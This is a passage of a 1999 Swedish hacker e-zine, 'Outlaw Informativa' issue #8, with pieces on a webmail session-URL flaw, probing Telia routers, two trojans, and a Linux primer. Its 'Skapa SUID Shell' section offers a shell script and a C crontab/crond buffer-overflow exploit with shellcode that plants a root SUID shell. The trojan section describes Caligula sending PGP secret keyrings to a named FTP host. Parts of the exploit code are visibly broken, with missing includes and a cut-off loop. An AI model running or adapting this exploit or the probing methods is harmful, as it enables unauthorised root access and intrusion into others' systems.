ryption Option" som andvänder Kerberos V4 authentication.
|
||
|
||
[ok, till själva problemet]
|
||
|
||
Vem som helst kan få tillgång till de krypterade paketen och enkelt dekrypte-
|
||
ra. Man kan enkelt sniffa paketen för att få tag i dem.
|
||
|
||
[Lösning]
|
||
|
||
Den vanliga lösningen är att ladda ner uppgraderingar, som jag listar nedan..
|
||
|
||
Source code för en patch: net-dist.mit.edu:/pub/telnet/telnet.patch
|
||
|
||
Uppgraderingar:
|
||
|
||
ftp.ncsa.uiuc.edu/Mac/Telnet/Telnet2.6/prerelease/d7/Telnet2.6.1d7(68K).sit.hqx
|
||
/Mac/Telnet/Telnet2.6/prerelease/d7/Telnet2.6.1d7(fat).sit.hqx
|
||
|
||
|
||
Plugins för Kerberos:
|
||
|
||
ftp.ncsa.uiuc.edu/Mac/Telnet/Telnet2.6/prerelease/AuthMan.plugin.1.0b1.hqx
|
||
/Mac/Telnet/Telnet2.6/prerelease/Kerberos_Telnet_plugin.sit.hqx
|
||
|
||
|
||
|
||
Källa: CERT
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
Möjlig bakdörr i marijuana.com
|
||
-----------------------------------------------------------------------------
|
||
Jag är lite osäker på detta men jag förklarar det jag upptäckte så skickar ni
|
||
information som jag inte vet till mig på keytrace@usa.net
|
||
|
||
http://mail.marijuana.com/mail/check_mail/user/c8116dca1e48dd76379f7582197293fa
|
||
|
||
c8116dca1e48dd76379f7582197293fa
|
||
|
||
Summan är samma varje gång någon loggar
|
||
in varje andvändare har sin egen summa
|
||
vilket tyder på att det är ett krypter-
|
||
at lösenord.
|
||
|
||
Om jag nu loggar in på min egna inbox på marijuana.com och kopierar url:en
|
||
till inboxen så kan denna person läsa alla min brev jag fått plus kolla på
|
||
filer som folk skickat till mig.
|
||
|
||
Det jag testade var att ge url:en till en polare på IRC och bad honom kolla
|
||
om han fick någon access till dem.
|
||
|
||
http://mail.marijuana.com/mail/check_mail/user/c8116dca1e48dd76379f7582197293fa
|
||
Är url:en till inboxen.
|
||
|
||
http://mail.marijuana.com/mail/attachment/user/c8116dca1e48dd76379f7582197293fa/pic.jpg?msg=6&part=8
|
||
Är url:en till en fil.
|
||
|
||
Detta funkade när jag va inloggad trycker jag på logout button i deras script
|
||
baserade webmail så har ingen access till url:en längre. Men om jag istället
|
||
skiter i att trycka på logout, så har alla access till min inbox, detta
|
||
bygger iofs på att den som vill rota i någons privata liv måste ha tillgång
|
||
till url:en. Det jag inte vet och det jag vill veta från er är om denna summa
|
||
eller teckensamling:
|
||
|
||
c8116dca1e48dd76379f7582197293fa
|
||
|
||
Är det ett krypterat lösenord eller en checksum eller liknande för deras
|
||
cgi/perl script. Om det är ett krypterat lösenord i sånna fall, vilken
|
||
algoritm andvänder dom ? .. Hur tar jag reda på det ?
|
||
|
||
Jag skickade ett email och frågade lite diskret hur hög säkerhet jag har och
|
||
vad för algortim dom andvänder, dom svarade:
|
||
|
||
|
||
We never give out our encryption methods, but I can assure you that we are
|
||
among the safest in the industry.
|
||
|
||
wm
|
||
m.com
|
||
|
||
|
||
On 12 Sep 1999, anon wrote:
|
||
|
||
> Date: 12 Sep 1999 05:35:36 -0700
|
||
> From: anon <xxxx>
|
||
> To: xxxx@marijuana.com
|
||
> Subject: how high is my security ?
|
||
>
|
||
> Hi!
|
||
> I´m sending you this e-mail because i want to know how high security i have because
|
||
> i dont want anything bad to happen to me or my e-mail. So i wounder
|
||
> what algorithm you use to encrypt my e-mails and if you are using a commercial,
|
||
> in that case, wich one? and if you are using your own, how safe is it for me to use?
|
||
>
|
||
> thanks.
|
||
>
|
||
> // X
|
||
|
||
Så på något sätt måste jag få reda på vad dessa siffror och bokstäver i
|
||
url:en till inboxen är, det är det jag behöver veta för att gå vidare.
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
Funderingar kring Telia
|
||
-----------------------------------------------------------------------------
|
||
Detta är också lite frågor som jag vill få reda på i denna artikel, som ni
|
||
självklart måste svara på om ni kan dom :)
|
||
|
||
Jag testade att göra en traceroute på mig själv av ren tråkighet och en av
|
||
de maskinerna som paketen som kommer från min dator som paserar maskinen va:
|
||
|
||
ny-b1-pos5-0-0.telia.net (209.95.159.22)
|
||
|
||
Jag testade att telnetta til maskinen [209.95.159.22] och fick då en login
|
||
prompt, som såg ut så här:
|
||
|
||
-------------------------
|
||
User Access Verification
|
||
|
||
Username:
|
||
-------------------------
|
||
|
||
En sak jag klurar över är om hosten [ny-b1-pos5-0-0.telia.net] har några
|
||
synonymer som betyder någon som kan ge mig information vad maskinen andvänds
|
||
till, om det är en router/firewall/proxy eller liknande.
|
||
|
||
De portar på maskinen som va öppnade:
|
||
|
||
79 Finger
|
||
23 Telnet
|
||
|
||
De som var filtrerade, alltså de som är bevakade av än Firewall är:
|
||
|
||
137 netbios-ns (vad står ns för?, namserver ?)
|
||
138 netbios-dgm (vad står dgm för ?)
|
||
139 netbios-ssn (Vad står ssn för ?, SecureSecuredNetwork =) ?)
|
||
|
||
Detta tyder på att dom andvänder NT, alla LAMA företag andvänder
|
||
NT, det är *NIX som gäller. Men kan också andväna Unix men också både
|
||
och, det är det som jag också vill få reda på. Jag testade att logga in på
|
||
ett telia konto på servern, det gav:
|
||
|
||
Jag testade att telnetta till finger porten (79) och fick då fram mitt eget
|
||
hostname, vilket tyder på att det är någon slags packet filter eller nåt.
|
||
|
||
Line User Host(s) Idle Location
|
||
* 2 vty 0 idle 00:00:00 xxxxxxxxx.telia.com
|
||
|
||
vty, ska stå för nåt med Virtual Terminal iafs.
|
||
idle står för hur länge sedan usern knappade på controllern, dvs tangentbo-
|
||
rdet.
|
||
|
||
Detta ser ut att vara någon slags PPP station och antagligen när man kommuni-
|
||
cerar mellan hemnumret till Telia så går informationen mellan olika datorer i
|
||
Telias nätverk som hanterar uppkopplingsförbindelserna osv.
|
||
|
||
Testa att telnetta till 209.95.159.21, vilket ger samma Login prompt som
|
||
209.95.159.22. Som tyder på att det är en rad datorer eller maskiner (typ
|
||
packet filter osv.) som styr uppkopplingen och kommunikation från min dator
|
||
genom telias nätverk till nästa dator, typ:
|
||
|
||
____ _ _ .------. _ _ ____
|
||
| |=========>|*|-->|*|--->|------|-->|*|-->|*|===>| |
|
||
|PC1 | | | |NT ¤| | | |xxx |
|
||
|____|<=========|*|<--|*|<---|Serv ¤|<--|*|<--|*|<===|____|
|
||
¯ ¯ '------' ¯ ¯
|
||
|
||
PC1: En persondator
|
||
_
|
||
|*|: Små applikationer som hör till telias nätverk, typ ppp stationer som
|
||
¯ hanterar uppkopplingar och förbindelser. En sak som är säker är att
|
||
Telia har ett antal ATM växlar som IP:et går igenom.
|
||
|
||
NT : Telias Windows NT server.
|
||
Serv
|
||
|
||
xxx: Datorn som innehåller filer för transmissionen, t.ex. FTP servern som
|
||
du ska hämta ner Slackware 4.0 ifrån eller helt enkelt t.ex. Aftonblade-
|
||
ts hemsida, välj själv.
|
||
|
||
Ok, nu testar vi en annan dator...
|
||
|
||
209.95.159.5 [sf-i2.telia.net]
|
||
|
||
Jag testar att telnetta, vilket ger en login prompt..precis som när jag
|
||
telnettade till 209.95.159.22 och 209.95.159.21.
|
||
|
||
Jag testade sedan att telnetta till Chargen(19) vilket genererade en massa
|
||
tecken som aldrig tog stopp, i den här stilen:
|
||
|
||
------------------------------------------------------------------------
|
||
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg
|
||
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh
|
||
"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
|
||
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
|
||
$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk
|
||
%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl
|
||
&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklm
|
||
'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmn
|
||
()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmno
|
||
)*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnop
|
||
*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopq
|
||
+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqr
|
||
,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrs
|
||
-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrst
|
||
./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstu
|
||
/0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuv
|
||
0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvw
|
||
123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwx
|
||
23456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxy
|
||
3456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz
|
||
------------------------------------------------------------------------
|
||
|
||
Enligt uppgifter har jag hört att chargen andvänds för att kontrollera
|
||
hastigheten i en anslutning. De kan även utnyttjas för DoS attacker.
|
||
|
||
|
||
Hmm, jag testar att göra en traceroute på 209.95.159.5:
|
||
|
||
1 167 ms 228 ms 174 ms md4690401.utfors.se [212.105.4.1]
|
||
2 162 ms 152 ms 157 ms br-00-00.utfors.net [195.58.102.1]
|
||
3 151 ms 154 ms 155 ms 195.58.100.50
|
||
4 * 266 ms 233 ms Hssi11-1-0.GW2.STK2.ALTER.NET [146.188.32.121]
|
||
5 249 ms * * 422.ATM6-0-0.CR1.STK2.Alter.Net [146.188.5.65]
|
||
6 347 ms 350 ms * 219.ATM5-0.BR1.NYC5.Alter.Net [146.188.7.110]
|
||
7 671 ms 733 ms 745 ms 431.ATM5-0.GW2.NYC5.ALTER.NET [137.39.30.141]
|
||
8 868 ms 920 ms * 152.ATM2-0.XR1.NYC1.ALTER.NET [146.188.177.246]
|
||
|
||
9 * * 875 ms 195.ATM6-0.XR1.NYC4.ALTER.NET [146.188.178.82]
|
||
10 714 ms * 614 ms 189.ATM3-0.GW8.NYC4.ALTER.NET [146.188.180.49]
|
||
11 268 ms 314 ms 259 ms Telia-gw.customer.ALTER.NET [157.130.5.74]
|
||
12 257 ms 258 ms 255 ms ny-b1-atm3-0-101.usa.telia.net [209.95.129.69]
|
||
13 381 ms 336 ms 330 ms sf-b1-pos0-0.telia.net [209.95.159.21]
|
||
14 460 ms 331 ms 345 ms sf-i2.telia.net [209.95.159.5]
|
||
|
||
ATM är ju en växel för transmission i Nätverk, intressant. Det tyder stor på
|
||
att det är en ATM växel. Om du telnettar till t.ex. 146.188.178.82 (troligtv-
|
||
is en ATM växel) så får du en login prompt.
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
Skapa SUID Shell
|
||
-----------------------------------------------------------------------------
|
||
#!/dev/null
|
||
## By ncode -99
|
||
## Detta skrevs av ren tråkighet, hoppas nån lär sig.
|
||
## Detta programmet skapar ett suid shell(/tmp/XxX) åt dig.
|
||
## Men root måste köra det för annars blir det ente suid.
|
||
## Om det känns för fattigt kan du alltid köra 2.c
|
||
## Det är kodat av Dillon.
|
||
|
||
<-- - - - - - - - -start of login.sh - - - - - - - - -->
|
||
cp /bin/bash /XxX
|
||
chmod 4755 /tmp/XxX
|
||
<-- - - - - - - - -end of login.sh - - - - - - - - -->
|
||
|
||
|
||
<-- - - - - - - - -start of 2.c- - - - - - - - -->
|
||
/* Detta gör ungefär samma sak som login.sh */
|
||
/* Kompilera 2.c och döp om a.out till nått trevligt */
|
||
/* Därefter ska bara root köra det */
|
||
|
||
#include
|
||
#include
|
||
#include
|
||
#include
|
||
#include
|
||
|
||
#define DEFAULT_OFFSET 560
|
||
#define DEFAULT_BUFFER_SIZE 980
|
||
#define TOTAL_BUFFER 4096
|
||
|
||
char shellcode[]=
|
||
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
|
||
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
|
||
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
|
||
"\xd7\xff\xff\xff/tmp/xo";
|
||
|
||
long get_esp(void) {
|
||
__asm__("movl %esp,%eax");
|
||
}
|
||
|
||
void calc_bs(int *bs_ptr)
|
||
{
|
||
int len=0;
|
||
struct passwd *p_name;
|
||
|
||
/* dependant on length of username */
|
||
p_name=getpwuid(getuid());
|
||
len=strlen(p_name->pw_name);
|
||
*bs_ptr = 986 - len;
|
||
return;
|
||
}
|
||
|
||
int main(int argc, char **argv) {
|
||
char *buff = NULL;
|
||
unsigned long *addr_ptr = NULL;
|
||
char *ptr = NULL;
|
||
int i, ofs=DEFAULT_OFFSET;
|
||
int bs=DEFAULT_BUFFER_SIZE;
|
||
FILE *fp=NULL;
|
||
|
||
/* probably will not need to give argument */
|
||
if (argc==2)
|
||
ofs=atoi(argv[1]);
|
||
calc_bs(&bs);
|
||
buff=malloc(TOTAL_BUFFER);
|
||
if(!buff) {
|
||
perror("malloc");
|
||
exit(EXIT_FAILURE);
|
||
}
|
||
ptr=buff;
|
||
memset(ptr,0x90, bs-strlen(shellcode));
|
||
ptr += bs-strlen(shellcode);
|
||
for (i=0; i\n");
|
||
fprintf(fp,"#include \n");
|
||
fprintf(fp,"main() {\n");
|
||
fprintf(fp,"\tsystem(\"/bin/cp /bin/sh /tmp/XxX\");\n");
|
||
fprintf(fp,"\tsystem(\"chown root /tmp/XxX\");\n");
|
||
fprintf(fp,"\tsystem(\"chmod 4755 /tmp/XxX\");\n");
|
||
fprintf(fp,"}\n");
|
||
fclose(fp);
|
||
/* compile our program to create suid shell */
|
||
system("cc -o /tmp/xo /tmp/xo.c");
|
||
unlink("/tmp/xo.c");
|
||
|
||
|
||
/* now use crontab to plant overflow for crond */
|
||
fp=fopen("r00t","w+");
|
||
if (!fp) {
|
||
perror("fopen");
|
||
exit(EXIT_FAILURE);
|
||
}
|
||
fprintf(fp,"%s\n",buff);
|
||
fclose(fp);
|
||
|
||
/* put our r00t crontab in crontabs directory */
|
||
system("/usr/bin/crontab r00t");
|
||
unlink("r00t");
|
||
|
||
/* helpful reminder */
|
||
printf("Now wait about 1 minute and look\n");
|
||
printf("for the suid shell -> /tmp/XxX\n");
|
||
exit(0);
|
||
}
|
||
<-- - - - - - - - -end of 2.c- - - - - - - - -->
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
Enkelt om 2 olika Trojaner
|
||
-----------------------------------------------------------------------------
|
||
[Förord]
|
||
|
||
Jag tänke skriva enkelt om hur trojanerna Caligula och Picture.exe fungerar
|
||
och vilket syfte de andvänds till.
|
||
|
||
En trojan är en körbar fil som innehåller något som inte en X vet om, och som
|
||
i syfte andvänds för att få full access till en dator för att t.ex. få tag i
|
||
Private Nycklar, Krypterade Filer, Hemligheter och Lösenord (typ .pwl)
|
||
|
||
|
||
[Caligula]
|
||
|
||
Caligula är en trojan som också kan betraktas som ett virus eftersom den inte
|
||
förstör något. Caligula är släppt av Codebreakers för er som inte visste.
|
||
Viruset eller Trojanen är i själva värket ett Macro Virus som först tar reda
|
||
på var du installerat PGP (Pretty Good Privacy) genom att öppna register
|
||
nyckeln: HKEY_CLASSES_ROOT\PGP Encrypted File\shell\open\command.
|
||
|
||
När den hittat var PGP är installerat letar den efter secret key ring (/PGP
|
||
Keyrings/secring.skr) och när den hittat den kopierar Caligula din secret key
|
||
ring och laddar upp den på Codebreakers ftp (208.201.88.110 eller ftp.codebr-
|
||
eakers.org) i "incoming" katalogen.
|
||
|
||
Efter ha kört Caligula skapar den en register nyckel i:
|
||
|
||
HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info\Caligula
|
||
|
||
och "value" till [1]
|
||
|
||
Om du vill veta om du är infekterad av Caligula kan du ju enkelt ta en titt
|
||
i registret, som alla vet så är Unix för säkert för att göra en trojan som
|
||
stödjer Linux, jo det är självklart att det finns. Men antalet trojaner som
|
||
finns för Windows 9x och Windows NT är överlägset. Trojaner för Unix andvänds
|
||
också ofta i ett annat syfte än en trojan för Windows.
|
||
|
||
|
||
[Picture.exe]
|
||
|
||
Picture.exe är en Trojan som skickas som bifogande via email. Picture.exe kan
|
||
också ses i namnet Manager.exe. Om du nu skulle öppna Picture.exe så plasera-
|
||
r den en liten fil i c:\Windows som heter note.exe också en rad i win.ini
|
||
(c:\Windows\win.ini) som ser ut så här: RUN=NOTE.EXE. För er som inte fattar
|
||
så startar trojanen som är döpt till note.exe varje gång Windows startar, sen
|
||
skapar den en fil i c:\Windows\$2321.dat, som innehåller en krypterad uppräk-
|
||
ning av alla filtillägg i katalog-trädet, som startar med h, i, m, p, s eller
|
||
t. Jag orkar inte förklara hur kryptering fungerar, det kan ni läsa i ISS.
|
||
Den letar efter sidor som offret varit på och email addresser, både lokala
|
||
och folk offret mailat. Sen testar trojanen att connecta till olika SMTP
|
||
servers och bli bekräftad. Picture.exe tar alltså kortfattat reda på en massa
|
||
information om din dator som kan andvändas för angrepp och dataintrång.
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
Brev angående telias rätt om språrning
|
||
-----------------------------------------------------------------------------
|
||
|
||
To: xxx@xxxxxx.com
|
||
From: xxx@telia.se
|
||
Subject:
|
||
|
||
Från Telias sida kommenterar vi inte i vilka sammanhang och hur vi går
|
||
tillväga för att avslöja de personer som utnyttjar ett internetkonto
|
||
obehörigt. Den enda kommentaren jag är beredd att ge dig är att alla
|
||
som använt ett internetkonto finns registrerade samt att Telia har rätt
|
||
att använda denna information för att vidtaga lämpliga åtgärder. Vill
|
||
u diskutera detta ytterligare hänvisar jag dig till chefen för vår
|
||
avdelning, Internetsäkerhetsutredningar, Lennart Andersson som träffas
|
||
på tel xxx-xxxxxx
|
||
|
||
|
||
|
||
-----Ursprungligt meddelande-----
|
||
Från: xxx@xxxxxx.com [xxx@xxxxxx.com ]
|
||
Skickat: den xx xxxx 1999
|
||
Till: xxx@telia.se
|
||
|
||
|
||
Tänkte bara höra om era rättigheter för spårning fortfarande är lika
|
||
meningslös? Min polare blev drabbad av dessa ligister som använder så
|
||
kallade felias (vilket i min mening är helt omoraliskt) och efter 3
|
||
månaders väntan och nerskrivning av online tider så kom telia fram till
|
||
att hans konto blev (ab)used men de hade inte resurserna till att
|
||
spåra.. Skulle verkligen bli glad om du läste igenom bifogad fil och
|
||
kommenterade korrekt respektive inkorrekt information..
|
||
Tack på förhand..
|
||
|
||
-----------------------------------------------------------------------------
|
||
Linux för dumma, del #1
|
||
-----------------------------------------------------------------------------
|
||
Eftersom jag studerar just ämnet Linux/Unix nu så tänkte jag börja på en
|
||
liten serie med olika delar kring Linux/Unix, förhoppningsvis både avancerat
|
||
och grundläggande. Dessa serier kommer vara skrivna helt för min egen skull.
|
||
Så kom inte och klaga.
|
||
|
||
[Katalogstrukteren]
|
||
|
||
/ - Rooten
|
||
/boot - Boot
|
||
/bin - Binary
|
||
/dev - Devices
|
||
/etc - Etc
|
||
/home - Home
|
||
/lost+found - Lost+found
|
||
/lib - Library
|
||
/mnt - Mounted
|
||
/proc - Proc
|
||
/root - Root
|
||
/sbin - Sbin
|
||
/tmp - Temporary
|
||
/usr - User
|
||
/var - Variable
|
||
|
||
|
||
-[ / ]-
|
||
Rooten innehåller inte något speciellt förutom alla andra Bibliotek.
|
||
|
||
|
||
-[ /boot ]-
|
||
I /boot ligger nästan allt som har med kerneln att göra. Denna heter vlinuz
|
||
eller vmlinuz-(version) och på vissa system även zImage. Här ligger även kart
|
||
filer som håller reda på ditt system.
|
||
|
||
|
||
-[ /bin ]-
|
||
bin = binary = binärt. /bin är ett bibliotek reserverat för programfiler, och
|
||
inte den enda (se längre ner i artikeln) Just i detta bibliotek ligger
|
||
kommando-program, så som typ ls, login, kill osv.
|
||
|
||
|
||
-[ /dev ] -
|
||
dev = devices. Här ligger filer som representerar gränsnitt på datorn, typ
|
||
floppyn, cdromen, zipdriven, nätverks kortet osv. Om du nu t.ex. vill mounta
|
||
floppyn skriver du.
|
||
|
||
# mount -t msdos /dev/fd0 /mnt/floppy
|
||
|
||
Biblioteket /mnt specifieras längre ner.
|
||
|
||
|
||
-[ /etc ]-
|
||
Innehåller alla konfigurations filer för olika program och tjänster, även
|
||
startfilerna (/etc/rc.d) och krypterade lösenord (/etc/shadow)
|
||
|
||
|
||
-[ /home ]-
|
||
Innehåller alla hem bibliotek för olika users.
|
||
|
||
|
||
-[ /lost+found ]-
|
||
I detta bibliotek lägger systemet alla filer och delar av filer som den
|
||
hittar när den städar hårdisken.
|
||
|
||
|
||
-[ /mnt ]-
|
||
Reserverat bibliotek för monterade partioner/cdrom/floppy osv, t.ex.
|
||
|
||
# cd /mnt
|
||
# ls
|
||
|
||
hda1 hda2 floppy cdrom
|
||
|
||
Iofs kan du montera t.ex. en floppy i vilket bibliotek du vill, men /mnt är
|
||
reserverad för det.
|
||
|
||
|
||
-[ /proc ]-
|
||
Detta biblitek innehåller inte något fysiskt filsystem, utan ett virtuellt
|
||
system som hålls av primärminnet. Biblioteket innehåller information om syst-
|
||
emet som många binära filer andvänder sig av. Du kan själv kolla genom att
|
||
ge kommandot
|
||
|
||
more /proc/interrups
|
||
|
||
|
||
-[ /root ]-
|
||
Detta är en hem bibliotek för självaste admin (root, superuser). Admins hem
|
||
bibbla ligger i ett separat bibliotek och inte i /home biblioteket.
|
||
|
||
-[ /sbin ]-
|
||
Innehåller installation/konfigurations verktyg som endast admin(root) kan
|
||
andvända, verktyg så som fdisk, xf86config osv.
|
||
|
||
|
||
-[ /tmp ]-
|
||
tmp = Temporary, /tmp är ett bibliotek för temporära filer. Fungerar precis i
|
||
samma syfte som c:/Windows/temp i Windoze 95.
|
||
|
||
|
||
-[ /usr ]-
|
||
Innehåller i stort sätt alla program på hela Native partitionen. /usr biblio-
|
||
teket är uppdelat i olika delar...
|
||
|
||
/usr/bin - Alla binära filer
|
||
/usr/lib - Alla librarys
|
||
/usr/doc - Dokumentation för alla program
|
||
/usr/man - Manualer för alla program (samma som ovan)
|
||
|
||
|
||
-[ /var ]-
|
||
var = variable, men iafs...här ligger filer som varierar i storlek. Kan du
|
||
komma på någon ? ..inte, jaja...men typ Loggfiler, låsfiler, PID-filer som
|
||
innehåller information om programs processnummer.
|
||
|
||
|
||
[Vad är Swap för något?]
|
||
|
||
Det finns många som inte vet vad Swap är för något. Jag tänkte berätta så
|
||
enkelt så möjligt vad det är och vad det andvänds till. Swap är ett
|
||
Virtuellt minne som hjälper till när de fysiska minnet inte räcker till.
|
||
Det första datorn gör när den arbetar är att ta till processorn, när proces-
|
||
sorn inte räcker till hjälper de fysiska minnet till (det är då det börjar
|
||
rassla i datorn) och när inte de fysiska minnet räcker till hjälper Swap
|
||
minnet till.
|
||
|
||
|
||
[Hur reagerar Linux när en andvändare inte har tillgång till ett kommando?]
|
||
|
||
Det finns många olika kommandon i Linux, en del får endast andvändas av
|
||
admin och en del är öppna för alla, hur reagerar Linux på detta ?
|
||
|
||
praktisera...
|
||
|
||
$ adduser
|
||
|
||
bash: adduser: command not found
|
||
|
||
Här ger bash utdata att kommandot inte finns. Men du vet ju var kommandot
|
||
adduser finns, ok..vi testar att gå till biblioteket där själv kommandot är
|
||
lagrat.
|
||
|
||
$ cd /sbin
|
||
$ adduser
|
||
|
||
bash: /sbin/adduser: Permission denied
|
||
|
||
Jippi!, här står i alla fall att du inte har tillgång till kommandot inte får
|
||
andvändas av någon annan en admin (root).
|
||
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
Insändare
|
||
-----------------------------------------------------------------------------
|
||
Denna sektion kommer i framtiden dyka upp när det kommer in frågor och åsikt-
|
||
er angående Heretics Inc. och Underground.
|
||
|
||
|
||
--> Netscape 4.05 (Messenger) kryptering
|
||
|
||
Nu är det jag som har en fråga, eftersom det inte är någon än som har
|
||
skickat in några frågor. Men jag undrar om det är nån som vet någon
|
||
dokumentation eller c-script som har med algoritmen som krypterar
|
||
Netscape Messenger i Netscape Communicator 4.05. Jag har märkt att om
|
||
du väljer att Messenger ska komma ihåg lösenordet till din mailserver
|
||
så sparas det i en fil /users/username/prefs.js. Kolla raden nedan
|
||
hur du nu hittar det krypterade lösenordet.
|
||
|
||
user_pref("mail.pop_password", "krypterat passwd");
|
||
user_pref("mail.remember_password", true);
|
||
|
||
Första raden handhåller det krypterade lösenordet och den andra om du
|
||
valt att composer ska komma ihåg ditt lösenord till ditt konto på
|
||
mailservern. Första raden finns alltså inte om du inte har satt andra
|
||
raden till "true"
|
||
|
||
diox1de@hacksweden.com
|
||
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
Avslutning
|
||
-----------------------------------------------------------------------------
|
||
Ja, nu var det slut för detta nummer, bättre information i nästa :)
|
||
|
||
|
||
|
||
O U T L A W I N F O R M A T I V A
|
||
issue #8
|
||
|
||
Produced and (c) Heretics Incoperated.
|
||
Time/Date: 22:45 1999-10-09
|
||
|
||
|
||
|
||
|
||
"Magic is a push/pull situation, like the universe itself. While one is
|
||
pushing, he cannot pull. The purpose of a ritual is to "push" the des-
|
||
ired result within a unique span of time and space, then move away and
|
||
"pull" by divorcing oneself from all thoughts and related acts previo-
|
||
usly ritualized."
|
||
|
||
|
||
|
||
|
||
Knowledge is power, with no power you never get Knowledge
|
||
- Heretics Inc.
|
||
|
||
|
||
|
||
|
||
-----BEGIN PGP SIGNATURE-----
|
||
Version: PGPfreeware 6.0.2i
|
||
|
||
iQA/AwUBN5zSsnRmgGlPBhFaEQLQngCgjAdjJAjiAqYXs9YTnGFjd0/VaXYAnj+Q
|
||
X3pmKDomoNWBQp8LyYIdwbqm
|
||
=estT
|
||
-----END PGP SIGNATURE-----
|
||
|